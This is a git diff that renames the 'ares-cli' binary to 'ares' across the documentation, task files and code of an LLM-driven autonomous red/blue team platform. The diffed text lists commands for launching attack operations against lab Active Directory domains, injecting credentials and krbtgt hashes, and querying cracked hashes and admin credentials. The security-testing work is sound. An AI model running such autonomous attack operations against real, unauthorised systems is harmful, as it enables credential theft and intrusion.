ares-red ops report --latest --regenerate -ares-cli --k8s ares-red ops export-detection --latest # Export markdown/JSON detection playbook -ares-cli --k8s ares-red ops offload-cost --latest # Sync token costs to Postgres +ares --k8s ares-red ops report --latest --regenerate +ares --k8s ares-red ops export-detection --latest # Export markdown/JSON detection playbook +ares --k8s ares-red ops offload-cost --latest # Sync token costs to Postgres ``` ### Maintenance ```bash -ares-cli --k8s ares-red ops backfill-domains op-xxx # Re-scan state to populate domain list -ares-cli --k8s ares-red ops kill --all # Kill all running ops -ares-cli --k8s ares-red ops cleanup --max-age-hours 24 # Delete old checkpoints +ares --k8s ares-red ops backfill-domains op-xxx # Re-scan state to populate domain list +ares --k8s ares-red ops kill --all # Kill all running ops +ares --k8s ares-red ops cleanup --max-age-hours 24 # Delete old checkpoints ``` ## Blue Team Operations @@ -145,26 +145,26 @@ ares-cli --k8s ares-red ops cleanup --max-age-hours 24 # Delete old checkpoin ```bash # From red team operation -ares-cli --k8s ares-blue blue from-operation --latest +ares --k8s ares-blue blue from-operation --latest # Single alert JSON -ares-cli --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 +ares --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 # Continuous poll mode -ares-cli --k8s ares-blue blue watch --poll-interval 30 +ares --k8s ares-blue blue watch --poll-interval 30 ``` ### Monitor & Reports ```bash -ares-cli --k8s ares-blue blue status --latest -ares-cli --k8s ares-blue blue evidence --latest --json -ares-cli --k8s ares-blue blue triage-status --latest -ares-cli --k8s ares-blue blue operation-status --latest --watch 5 +ares --k8s ares-blue blue status --latest +ares --k8s ares-blue blue evidence --latest --json +ares --k8s ares-blue blue triage-status --latest +ares --k8s ares-blue blue operation-status --latest --watch 5 # Reports -ares-cli --k8s ares-blue blue report --latest # Multi-investigation summary -ares-cli --k8s ares-blue blue report --investigation-id inv-xxx # Single report +ares --k8s ares-blue blue report --latest # Multi-investigation summary +ares --k8s ares-blue blue report --investigation-id inv-xxx # Single report ``` ## Historical Data (Requires Postgres) @@ -172,11 +172,11 @@ ares-cli --k8s ares-blue blue report --investigation-id inv-xxx # Single report Use these to query results across all previous operations. ```bash -ares-cli history list --domain contoso.local --has-da true -ares-cli history search-creds --username admin --admin -ares-cli history search-hashes --hash-type kerberoast --cracked -ares-cli history mitre-coverage --since-days 30 -ares-cli history cost --since-days 7 +ares history list --domain contoso.local --has-da true +ares history search-creds --username admin --admin +ares history search-hashes --hash-type kerberoast --cracked +ares history mitre-coverage --since-days 30 +ares history cost --since-days 7 ``` ## Configuration Management @@ -184,10 +184,10 @@ ares-cli history cost --since-days 7 Config file: `./config/ares.yaml` is the single source of truth. ```bash -ares-cli config show --models # show model assignments -ares-cli config set-model orchestrator gpt-5.2 # set per-role model -ares-cli config set-model --all gpt-5.2 # set all roles -ares-cli config validate # check config file +ares config show --models # show model assignments +ares config set-model orchestrator gpt-5.2 # set per-role model +ares config set-model --all gpt-5.2 # set all roles +ares config validate # check config file # Taskfile wrappers task config:models @@ -208,10 +208,10 @@ task remote:logs ROLE=orchestrator # Read logs ### Debugging Stuck Operations 1. **Check Grafana** (`grafana.dev.plundr.ai`) for token usage and Loki errors. -2. **Check failed tasks**: `ares-cli --k8s ares-red ops tasks --latest --status failed`. +2. **Check failed tasks**: `ares --k8s ares-red ops tasks --latest --status failed`. 3. **Verify binary sync**: `task remote:check`. 4. **Inject state**: If the LLM is stuck on a specific discovery step, manually inject the result. -5. **Restart**: `ares-cli --k8s ares-red ops kill --all` then re-submit. +5. **Restart**: `ares --k8s ares-red ops kill --all` then re-submit. ## GOAD Lab Reference @@ -221,6 +221,6 @@ task remote:logs ROLE=orchestrator # Read logs ## Important Notes -- **CLI vs Taskfile**: Use `ares-cli` with `--k8s` for querying status and loot. Use `task` for deployment, launching new operations, and complex multi-step workflows. +- **CLI vs Taskfile**: Use `ares` with `--k8s` for querying status and loot. Use `task` for deployment, launching new operations, and complex multi-step workflows. - **1Password**: If `--secrets-from 1password` is used, ensure you are logged in (`op signin`). -- **Binary Sync**: The system is sensitive to version mismatches between local `ares-cli` and remote `ares-orchestrator`. Always `task remote:rust:deploy:quick` after code changes. +- **Binary Sync**: The system is sensitive to version mismatches between local `ares` and remote `ares-orchestrator`. Always `task remote:rust:deploy:quick` after code changes. diff --git a/.github/CONTRIBUTING.md b/.github/CONTRIBUTING.md index 5c6398e8..7808ccc6 100644 --- a/.github/CONTRIBUTING.md +++ b/.github/CONTRIBUTING.md @@ -32,13 +32,11 @@ cargo test --workspace ### Project Structure -Ares is a Cargo workspace with six crates: +Ares is a Cargo workspace that compiles to a single `ares` binary: | Crate | Type | Purpose | |-------|------|---------| -| `ares-cli` | Binary | Unified CLI for ops, blue, history, config | -| `ares-orchestrator` | Binary | LLM-powered coordination loop | -| `ares-worker` | Binary | Task execution agents | +| `ares-cli` | Binary | Unified binary — CLI, orchestrator, and worker | | `ares-core` | Library | Shared models, state, Redis schema, telemetry | | `ares-llm` | Library | Model-agnostic LLM provider abstraction | | `ares-tools` | Library | Tool dispatch and execution framework | diff --git a/.taskfiles/blue/Taskfile.yaml b/.taskfiles/blue/Taskfile.yaml index 9c65fb01..40b616aa 100644 --- a/.taskfiles/blue/Taskfile.yaml +++ b/.taskfiles/blue/Taskfile.yaml @@ -114,7 +114,7 @@ tasks: ANTHROPIC_API_KEY="{{.ANTHROPIC_API_KEY}}" \ GRAFANA_SERVICE_ACCOUNT_TOKEN="{{.GRAFANA_SERVICE_ACCOUNT_TOKEN}}" \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli blue from-operation $OP_ARGS \ + ares blue from-operation $OP_ARGS \ $MODEL_FLAG \ --max-steps {{.MAX_STEPS_BLUE_ONCE}} \ --grafana-url "{{.GRAFANA_URL}}" @@ -308,7 +308,7 @@ tasks: ANTHROPIC_API_KEY="{{.ANTHROPIC_API_KEY}}" \ GRAFANA_SERVICE_ACCOUNT_TOKEN="{{.GRAFANA_SERVICE_ACCOUNT_TOKEN}}" \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli blue submit "$(cat {{.ALERT}})" \ + ares blue submit "$(cat {{.ALERT}})" \ $INV_ID_ARG \ $MODEL_FLAG \ --max-steps {{.MAX_STEPS_BLUE}} \ @@ -348,7 +348,7 @@ tasks: ANTHROPIC_API_KEY="{{.ANTHROPIC_API_KEY}}" \ GRAFANA_SERVICE_ACCOUNT_TOKEN="{{.GRAFANA_SERVICE_ACCOUNT_TOKEN}}" \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli blue from-operation $OP_ARGS \ + ares blue from-operation $OP_ARGS \ $MODEL_FLAG \ --max-steps {{.MAX_STEPS_BLUE}} \ --grafana-url "{{.GRAFANA_URL}}" diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 5725c694..d8b07465 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -81,7 +81,7 @@ tasks: ARES_CONFIG="/etc/ares/config.yaml" \ ARES_MULTI_FOREST_MODE=false \ GRAFANA_URL="{{.GRAFANA_URL}}" \ - ares-cli --redis-url "{{.REDIS_URL}}" ops submit \ + ares --redis-url "{{.REDIS_URL}}" ops submit \ "{{.TARGET}}" "{{.DOMAIN}}" \ --resolve-targets \ --aws-profile "{{.TARGET_PROFILE}}" \ @@ -181,7 +181,7 @@ tasks: ignore_error: true # =========================================================================== - # K8s CLI wrappers — run ares-cli on the orchestrator pod + # K8s CLI wrappers — run ares on the orchestrator pod # =========================================================================== multi:loot: @@ -929,7 +929,7 @@ tasks: # 2. Clear Redis (no longer rescales orchestrator) - cmd: echo "=== CLEARING REDIS CACHE ===" - task: multi:redis:clear - # 3. Patch orchestrator wrapper to use ares-cli instead of redis-cli + # 3. Patch orchestrator wrapper to use ares instead of redis-cli - cmd: echo "=== PATCHING ORCHESTRATOR WRAPPER ===" - task: :remote:orchestrator:patch-wrapper # 4. Rollout pods (fresh containers) diff --git a/.taskfiles/remote/Taskfile.yaml b/.taskfiles/remote/Taskfile.yaml index dce4f16f..8d0f8bb7 100644 --- a/.taskfiles/remote/Taskfile.yaml +++ b/.taskfiles/remote/Taskfile.yaml @@ -905,7 +905,7 @@ tasks: EOF orchestrator:patch-wrapper: - desc: "Patch the red orchestrator deployment wrapper to use ares-cli instead of redis-cli" + desc: "Patch the red orchestrator deployment wrapper to use ares instead of redis-cli" silent: true cmds: - | diff --git a/AGENTS.md b/AGENTS.md index 88f80746..705f7caf 100644 --- a/AGENTS.md +++ b/AGENTS.md @@ -7,8 +7,8 @@ Use this workflow when the task is to operate the distributed Ares red/blue team ```text Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (LLM coordination loop) - or `task` commands ares-worker x7 (recon, credential_access, +ares --k8s / --ec2 → ares orchestrator (LLM coordination loop) + or `task` commands ares worker x7 (recon, credential_access, cracker, acl, privesc, lateral, coercion) Redis (state store + message broker) ``` @@ -17,9 +17,9 @@ The orchestrator and workers are autonomous LLM agents. You do not control them ## Deployment Targets -**K8s**: Use `ares-cli --k8s ` or `task red:multi:*`. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). +**K8s**: Use `ares --k8s ` or `task red:multi:*`. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). -**EC2**: Use `ares-cli --ec2 ` or `task ec2:*`. Resolves the instance by Name tag and executes via AWS SSM. +**EC2**: Use `ares --ec2 ` or `task ec2:*`. Resolves the instance by Name tag and executes via AWS SSM. ## Global CLI Flags @@ -67,7 +67,7 @@ After code changes, always deploy before testing remote behavior. Use `task remo task red:multi TARGET=dreadgoad DOMAIN=sevenkingdoms.local # Direct CLI -ares-cli ops submit dreadgoad contoso.local \ +ares ops submit dreadgoad contoso.local \ --username administrator --password P@ssw0rd \ --model gpt-5.2 --max-steps 200 --follow @@ -78,11 +78,11 @@ task ec2:launch DOMAIN=sevenkingdoms.local TARGETS=192.168.58.10 ### Monitor ```bash -ares-cli --k8s ares-red ops status --latest -ares-cli --k8s ares-red ops loot --latest --watch 10 --diff -ares-cli --k8s ares-red ops tasks --latest --status failed -ares-cli --k8s ares-red ops queue -ares-cli --k8s ares-red ops list +ares --k8s ares-red ops status --latest +ares --k8s ares-red ops loot --latest --watch 10 --diff +ares --k8s ares-red ops tasks --latest --status failed +ares --k8s ares-red ops queue +ares --k8s ares-red ops list task red:multi:status LATEST=true task red:multi:loot LATEST=true WATCH=10 @@ -94,24 +94,24 @@ task red:multi:tasks:list LATEST=true STATUS=failed Use injection to unblock stalled operations. ```bash -ares-cli --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local -ares-cli --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." -ares-cli --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local -ares-cli --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." -ares-cli --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ +ares --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local +ares --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." +ares --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local +ares --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." +ares --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ --account-name svc_sql --domain fabrikam.local ``` ### Reports and maintenance ```bash -ares-cli --k8s ares-red ops report --latest --regenerate -ares-cli --k8s ares-red ops export-detection --latest -ares-cli --k8s ares-red ops offload-cost --latest +ares --k8s ares-red ops report --latest --regenerate +ares --k8s ares-red ops export-detection --latest +ares --k8s ares-red ops offload-cost --latest -ares-cli --k8s ares-red ops backfill-domains op-xxx -ares-cli --k8s ares-red ops kill --all -ares-cli --k8s ares-red ops cleanup --max-age-hours 24 +ares --k8s ares-red ops backfill-domains op-xxx +ares --k8s ares-red ops kill --all +ares --k8s ares-red ops cleanup --max-age-hours 24 ``` ## Blue Team Operations @@ -119,20 +119,20 @@ ares-cli --k8s ares-red ops cleanup --max-age-hours 24 ### Submit investigations ```bash -ares-cli --k8s ares-blue blue from-operation --latest -ares-cli --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 -ares-cli --k8s ares-blue blue watch --poll-interval 30 +ares --k8s ares-blue blue from-operation --latest +ares --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 +ares --k8s ares-blue blue watch --poll-interval 30 ``` ### Monitor and report ```bash -ares-cli --k8s ares-blue blue status --latest -ares-cli --k8s ares-blue blue evidence --latest --json -ares-cli --k8s ares-blue blue triage-status --latest -ares-cli --k8s ares-blue blue operation-status --latest --watch 5 -ares-cli --k8s ares-blue blue report --latest -ares-cli --k8s ares-blue blue report --investigation-id inv-xxx +ares --k8s ares-blue blue status --latest +ares --k8s ares-blue blue evidence --latest --json +ares --k8s ares-blue blue triage-status --latest +ares --k8s ares-blue blue operation-status --latest --watch 5 +ares --k8s ares-blue blue report --latest +ares --k8s ares-blue blue report --investigation-id inv-xxx ``` ## Historical Data @@ -140,11 +140,11 @@ ares-cli --k8s ares-blue blue report --investigation-id inv-xxx These commands require Postgres. ```bash -ares-cli history list --domain contoso.local --has-da true -ares-cli history search-creds --username admin --admin -ares-cli history search-hashes --hash-type kerberoast --cracked -ares-cli history mitre-coverage --since-days 30 -ares-cli history cost --since-days 7 +ares history list --domain contoso.local --has-da true +ares history search-creds --username admin --admin +ares history search-hashes --hash-type kerberoast --cracked +ares history mitre-coverage --since-days 30 +ares history cost --since-days 7 ``` ## Configuration @@ -152,10 +152,10 @@ ares-cli history cost --since-days 7 The source of truth is `./config/ares.yaml`. ```bash -ares-cli config show --models -ares-cli config set-model orchestrator gpt-5.2 -ares-cli config set-model --all gpt-5.2 -ares-cli config validate +ares config show --models +ares config set-model orchestrator gpt-5.2 +ares config set-model --all gpt-5.2 +ares config validate task config:models task config:set-model -- orchestrator gpt-5.2 @@ -173,10 +173,10 @@ task remote:logs ROLE=orchestrator When an operation is stuck: 1. Check Grafana (`grafana.dev.plundr.ai`) for token use and Loki errors. -2. Check failed tasks with `ares-cli --k8s ares-red ops tasks --latest --status failed`. +2. Check failed tasks with `ares --k8s ares-red ops tasks --latest --status failed`. 3. Verify binary sync with `task remote:check`. 4. Inject known state if the model is blocked on a discovery step. -5. Restart with `ares-cli --k8s ares-red ops kill --all`, then resubmit. +5. Restart with `ares --k8s ares-red ops kill --all`, then resubmit. ## GOAD Lab Reference @@ -186,7 +186,7 @@ When an operation is stuck: ## Operating Rules -- Prefer `ares-cli --k8s` for status, loot, reports, and direct operational queries. +- Prefer `ares --k8s` for status, loot, reports, and direct operational queries. - Prefer `task` for deployments, launches, and multi-step workflows. - If using `--secrets-from 1password`, ensure `op signin` is already valid. - The system is sensitive to local/remote binary mismatches. After code changes, run `task remote:rust:deploy:quick` and then `task remote:check`. diff --git a/README.md b/README.md index 383da426..0673ceb1 100644 --- a/README.md +++ b/README.md @@ -29,24 +29,24 @@ LLM-coordinated autonomous security operations platform with two modes: ## Architecture -Ares is a Rust workspace with six crates: +Ares is a Rust workspace that compiles to a single `ares` binary with +subcommands (`ares ops`, `ares orchestrator`, `ares worker`, `ares blue`, +`ares history`, `ares config`): -| Crate | Binary | Purpose | -| ------------------- | ------------------- | --------------------------------------------------------- | -| `ares-cli` | `ares-cli` | Unified CLI - ops, blue, history, config management | -| `ares-orchestrator` | `ares-orchestrator` | LLM-powered coordination loop, task dispatch, strategy | -| `ares-worker` | `ares-worker` | Task execution agents (one per role, K8s or EC2) | -| `ares-core` | - | Shared models, state management, Redis schema, telemetry | -| `ares-llm` | - | LLM providers (Anthropic, OpenAI, Ollama) + tool registry | -| `ares-tools` | - | Tool dispatch and execution framework | +| Crate | Purpose | +| ------------ | --------------------------------------------------------- | +| `ares-cli` | Unified binary — CLI, orchestrator, and worker | +| `ares-core` | Shared models, state management, Redis schema, telemetry | +| `ares-llm` | LLM providers (Anthropic, OpenAI, Ollama) + tool registry | +| `ares-tools` | Tool dispatch and execution framework | ### Red Team Multi-Agent System ``` Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (LLM coordination loop) - or `task` commands ares-worker x7 (recon, credential_access, +ares --k8s / --ec2 → ares orchestrator (LLM coordination loop) + or `task` commands ares worker x7 (recon, credential_access, cracker, acl, privesc, lateral, coercion) Redis (state store + message broker) ``` @@ -70,8 +70,8 @@ results back. The orchestrator never executes exploitation tools directly. ``` Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (investigation coordination) - or `task` commands ares-worker x4 (triage, threat_hunter, +ares --k8s / --ec2 → ares orchestrator (investigation coordination) + or `task` commands ares worker x4 (triage, threat_hunter, lateral_analyst, escalation_triage) Redis (state store + message broker) Grafana (Loki logs + Prometheus metrics) @@ -109,7 +109,7 @@ task rust:build # debug build task rust:release # release build (recommended) # Verify -./target/release/ares-cli --help +./target/release/ares --help ``` **Configure:** @@ -128,22 +128,22 @@ task ares:config:check ## CLI Reference -The `ares-cli` binary is the unified interface for all operations. It supports +The `ares` binary is the unified interface for all operations. It supports transparent remote execution via transport flags. ### Transport Flags ```bash # K8s: execute on orchestrator pod via kubectl -ares-cli --k8s ares-red ops loot --latest -ares-cli --k8s ares-blue blue status --latest +ares --k8s ares-red ops loot --latest +ares --k8s ares-blue blue status --latest # EC2: execute on instance via AWS SSM -ares-cli --ec2 kali-ares ops loot --latest +ares --ec2 kali-ares ops loot --latest # Override defaults -ares-cli --k8s ares-red --k8s-deploy ares-orchestrator ops list -ares-cli --ec2 kali-ares --ec2-profile prod --ec2-region us-east-1 ops list +ares --k8s ares-red --k8s-deploy ares-orchestrator ops list +ares --ec2 kali-ares --ec2-profile prod --ec2-region us-east-1 ops list ``` | Flag | Default | Description | @@ -226,7 +226,7 @@ ares-cli --ec2 kali-ares --ec2-profile prod --ec2-region us-east-1 ops list task red:multi TARGET=dreadgoad DOMAIN=sevenkingdoms.local # Via CLI directly -ares-cli ops submit dreadgoad sevenkingdoms.local \ +ares ops submit dreadgoad sevenkingdoms.local \ --ips 192.168.58.10,192.168.58.11 \ --model gpt-5.2 --follow @@ -237,35 +237,35 @@ task ec2:launch DOMAIN=sevenkingdoms.local TARGETS=192.168.58.10,192.168.58.11 ### Monitor ```bash -ares-cli --k8s ares-red ops status --latest -ares-cli --k8s ares-red ops loot --latest --watch 10 -ares-cli --k8s ares-red ops tasks --latest --status failed -ares-cli --k8s ares-red ops runtime --latest +ares --k8s ares-red ops status --latest +ares --k8s ares-red ops loot --latest --watch 10 +ares --k8s ares-red ops tasks --latest --status failed +ares --k8s ares-red ops runtime --latest task remote:logs ROLE=orchestrator ``` ### Inject State (Unblock Stuck Operations) ```bash -ares-cli --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd \ +ares --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd \ --domain contoso.local -ares-cli --k8s ares-red ops inject-hash op-xxx krbtgt \ +ares --k8s ares-red ops inject-hash op-xxx krbtgt \ "aad3b435b51404eeaad3b435b51404ee:313b6f423a..." \ --domain sevenkingdoms.local --aes-key "f8b6c5e4d3a2b109..." -ares-cli --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.essos.local +ares --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.essos.local -ares-cli --k8s ares-red ops inject-domain-sid op-xxx \ +ares --k8s ares-red ops inject-domain-sid op-xxx \ --domain north.sevenkingdoms.local --sid "S-1-5-21-..." ``` ### Reports ```bash -ares-cli --k8s ares-red ops report --latest -ares-cli --k8s ares-red ops report --latest --regenerate -ares-cli --k8s ares-red ops export-detection --latest +ares --k8s ares-red ops report --latest +ares --k8s ares-red ops report --latest --regenerate +ares --k8s ares-red ops export-detection --latest ``` ### Operation Phases @@ -344,12 +344,10 @@ See [Blue Team Documentation](docs/blue.md) for full command reference. ### Repository Layout ```text -ares-cli/ # CLI binary crate +ares-cli/ # Unified binary (CLI + orchestrator + worker) ares-core/ # Shared library (models, state, telemetry) ares-llm/ # LLM provider abstraction -ares-orchestrator/ # Orchestrator binary crate ares-tools/ # Tool dispatch framework -ares-worker/ # Worker binary crate config/ # Configuration files ares.yaml # Master config (models, timeouts, capabilities) @@ -446,10 +444,10 @@ The master config lives at `config/ares.yaml`. It defines: - Recovery and context management settings ```bash -ares-cli config show --models # show model assignments -ares-cli config set-model orchestrator gpt-5.2 -ares-cli config set-model --all gpt-5.2 -ares-cli config validate +ares config show --models # show model assignments +ares config set-model orchestrator gpt-5.2 +ares config set-model --all gpt-5.2 +ares config validate ``` ### Environment Variables diff --git a/Taskfile.yaml b/Taskfile.yaml index 53e402ed..863becbc 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -185,14 +185,14 @@ tasks: silent: true cmds: - cargo build - - echo "Debug binary built at target/debug/ares-cli" + - echo "Debug binary built at target/debug/ares" rust:release: desc: Build the Rust CLI binary (release) silent: true cmds: - cargo build --release - - echo "Release binary built at target/release/ares-cli" + - echo "Release binary built at target/release/ares" rust:test: desc: Run Rust tests diff --git a/ares-cli/src/blue/submit.rs b/ares-cli/src/blue/submit.rs index ef40ee1f..ececdb21 100644 --- a/ares-cli/src/blue/submit.rs +++ b/ares-cli/src/blue/submit.rs @@ -242,7 +242,7 @@ pub(crate) async fn blue_from_operation( info!("Investigation submitted: {inv_id}"); println!("Investigation submitted: {inv_id} (from operation {op_id})"); println!("Status: submitted"); - println!("\nTrack progress with: ares-cli blue operation-status {op_id}"); + println!("\nTrack progress with: ares blue operation-status {op_id}"); Ok(()) } diff --git a/ares-cli/src/ops/backfill.rs b/ares-cli/src/ops/backfill.rs index d57f39ff..23fc8876 100644 --- a/ares-cli/src/ops/backfill.rs +++ b/ares-cli/src/ops/backfill.rs @@ -163,7 +163,7 @@ pub(crate) async fn ops_offload_cost( if rows_affected == 0 { println!( "Warning: Operation {op_id} not found in PostgreSQL. \ - Run 'ares-cli ops offload' to persist the operation first." + Run 'ares ops offload' to persist the operation first." ); return Ok(()); } diff --git a/ares-cli/src/orchestrator/blue/auto_submit.rs b/ares-cli/src/orchestrator/blue/auto_submit.rs index cf64061d..38ccfd73 100644 --- a/ares-cli/src/orchestrator/blue/auto_submit.rs +++ b/ares-cli/src/orchestrator/blue/auto_submit.rs @@ -169,7 +169,7 @@ async fn submit_investigation( let grafana_url = std::env::var("GRAFANA_URL").ok(); let grafana_token = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); - // Build synthetic alert (mirrors ares-cli blue from-operation) + // Build synthetic alert (mirrors `ares blue from-operation`) let operation_context = serde_json::json!({ "operation_id": op_id, "attack_window_start": now.to_rfc3339(), diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs index a0b566a1..d9583757 100644 --- a/ares-cli/src/orchestrator/blue/investigation.rs +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -72,7 +72,7 @@ pub async fn run_investigation( ); // Load investigation env vars from Redis and inject into process environment. - // These are set by `ares-cli blue from-operation` and include GRAFANA_URL, + // These are set by `ares blue from-operation` and include GRAFANA_URL, // GRAFANA_SERVICE_ACCOUNT_TOKEN, etc. needed by blue tools (e.g. Loki queries // routed through Grafana's datasource proxy). let env_key = format!("ares:blue:inv:{}:env_vars", investigation.investigation_id); diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs index 0d9aa4da..1d79481f 100644 --- a/ares-cli/src/orchestrator/mod.rs +++ b/ares-cli/src/orchestrator/mod.rs @@ -595,7 +595,7 @@ async fn run_inner() -> Result<()> { } } - // Poll for remote stop signal from `ares-cli ops stop` + // Poll for remote stop signal from `ares ops stop` _ = stop_check.tick() => { let mut conn = queue.connection(); match ares_core::state::is_stop_requested(&mut conn, &config.operation_id).await { diff --git a/ares-core/src/lib.rs b/ares-core/src/lib.rs index 6d5ef15f..989cf7f3 100644 --- a/ares-core/src/lib.rs +++ b/ares-core/src/lib.rs @@ -1,7 +1,7 @@ //! Core library for the Ares red team orchestration system. //! //! This crate provides the data models and Redis state backend used by the -//! `ares-cli` binary to interact with the Ares orchestrator system. +//! `ares` binary to interact with the Ares orchestrator system. //! //! # Modules //! diff --git a/docs/blue.md b/docs/blue.md index 8a7cae2f..7bc53733 100644 --- a/docs/blue.md +++ b/docs/blue.md @@ -25,7 +25,7 @@ findings to MITRE ATT&CK, and writes investigation reports. #### Investigation Orchestrator -**Location:** `ares-orchestrator/src/blue/` +**Location:** `ares-cli/src/orchestrator/blue/` The investigation orchestrator manages the full investigation lifecycle: @@ -38,7 +38,7 @@ The investigation orchestrator manages the full investigation lifecycle: #### Blue Worker Task Loop -**Location:** `ares-worker/src/blue_task_loop.rs` +**Location:** `ares-cli/src/worker/blue_task_loop.rs` Runs the worker-side investigation loop with: @@ -595,8 +595,8 @@ Provides structured investigation workflows: | Component | Path | | ----------- | ------ | -| Blue Orchestrator | `ares-orchestrator/src/blue/` | -| Blue Worker Task Loop | `ares-worker/src/blue_task_loop.rs` | +| Blue Orchestrator | `ares-cli/src/orchestrator/blue/` | +| Blue Worker Task Loop | `ares-cli/src/worker/blue_task_loop.rs` | | Blue CLI Commands | `ares-cli/src/blue/` | | Core Models | `ares-core/src/models/` | | State Management | `ares-core/src/state/` | @@ -638,7 +638,7 @@ blue_team: `GRAFANA_SERVICE_ACCOUNT_TOKEN`, `DREADNODE_API_KEY` - **Grafana MCP** configured (see [Grafana MCP Usage](grafana_mcp_usage.md)) - **Redis** accessible (K8s in-cluster, or port-forwarded for local/EC2) -- **ares-cli** binary built (`cargo build --release`) +- **ares** binary built (`cargo build --release`) ### Quick Start @@ -758,39 +758,39 @@ task blue:multi:cleanup ALL=true DRY_RUN=true # preview before deleting ### Direct CLI Commands For environments without Taskfile, or when you need more control, use -`ares-cli` directly. Add `--k8s ` for K8s or `--ec2 ` for +`ares` directly. Add `--k8s ` for K8s or `--ec2 ` for EC2 transport. ```bash # Submit from red team operation alerts -ares-cli blue from-operation --latest -ares-cli --k8s attack-simulation blue from-operation op-xxx +ares blue from-operation --latest +ares --k8s attack-simulation blue from-operation op-xxx # Submit a single alert -ares-cli blue submit '{"alert_title":"Suspicious LSASS","severity":"high"}' +ares blue submit '{"alert_title":"Suspicious LSASS","severity":"high"}' # Continuous poll mode -ares-cli blue watch --poll-interval 30 --max-steps 50 +ares blue watch --poll-interval 30 --max-steps 50 # Investigation status and results -ares-cli blue list -ares-cli blue status --latest -ares-cli blue evidence --latest -ares-cli blue evidence --latest --json -ares-cli blue techniques --latest -ares-cli blue runtime --latest -ares-cli blue triage-status --latest -ares-cli blue operation-status --latest --watch 10 +ares blue list +ares blue status --latest +ares blue evidence --latest +ares blue evidence --latest --json +ares blue techniques --latest +ares blue runtime --latest +ares blue triage-status --latest +ares blue operation-status --latest --watch 10 # Report generation -ares-cli blue report --latest --output-dir ./reports -ares-cli blue report --operation-id op-xxx --regenerate +ares blue report --latest --output-dir ./reports +ares blue report --operation-id op-xxx --regenerate # Cleanup -ares-cli blue delete inv-xxx --force -ares-cli blue delete-operation op-xxx --force -ares-cli blue cleanup --max-age-hours 24 --all --force -ares-cli blue cleanup --dry-run +ares blue delete inv-xxx --force +ares blue delete-operation op-xxx --force +ares blue cleanup --max-age-hours 24 --all --force +ares blue cleanup --dry-run ``` ### EC2 Deployment @@ -802,7 +802,7 @@ When running on EC2 instead of K8s, port-forward Redis first: task ec2:redis:forward EC2_NAME=ares-tools # In another terminal, run blue commands with the forwarded Redis -ARES_REDIS_URL=redis://localhost:16379 ares-cli blue from-operation --latest +ARES_REDIS_URL=redis://localhost:16379 ares blue from-operation --latest ``` ### Running Blue Alongside Red diff --git a/docs/grafana_mcp_usage.md b/docs/grafana_mcp_usage.md index ee839e75..a86a3e60 100644 --- a/docs/grafana_mcp_usage.md +++ b/docs/grafana_mcp_usage.md @@ -160,7 +160,7 @@ To use these capabilities: 1. Ensure the Grafana MCP server is configured and running 2. Set the `GRAFANA_URL` and `GRAFANA_SERVICE_ACCOUNT_TOKEN` environment variables -3. Start a blue team investigation: `ares-cli blue from-operation --latest` +3. Start a blue team investigation: `ares blue from-operation --latest` 4. Agents will automatically use Grafana tools during investigation For more information, see: diff --git a/docs/infrastructure.md b/docs/infrastructure.md index d09185b3..c1d4c8a1 100644 --- a/docs/infrastructure.md +++ b/docs/infrastructure.md @@ -56,12 +56,12 @@ ansible/ Ansible collection (dreadnode.nimbus_range v merge_list_dicts_into_list.py Data transformation utility warpgate-templates/ Container image build templates - ares-python-base/ Base: Kali + Ansible base role + security tools - ares-python-orchestrator/ Orchestrator: Rust binary + Redis client - ares-python-worker/ Generic worker (inherits ares-python-base) - ares-python-{recon,credential-access,cracker,acl,privesc,lateral-movement,coercion}-agent/ - ares-python-cracker-{agent-gpu,base-gpu}/ - ares-python-blue-{agent,triage-agent,threat-hunter-agent,lateral-analyst-agent}/ + ares-base/ Base: Kali + Ansible base role + security tools + ares-orchestrator/ Orchestrator: unified Ares binary + Redis client + ares-worker/ Generic worker (inherits ares-base) + ares-{recon,credential-access,cracker,acl,privesc,lateral-movement,coercion}-agent/ + ares-cracker-{agent-gpu,base-gpu}/ + ares-blue-{agent,triage-agent,threat-hunter-agent,lateral-analyst-agent}/ ares-golden-image/ All-in-one red team EC2 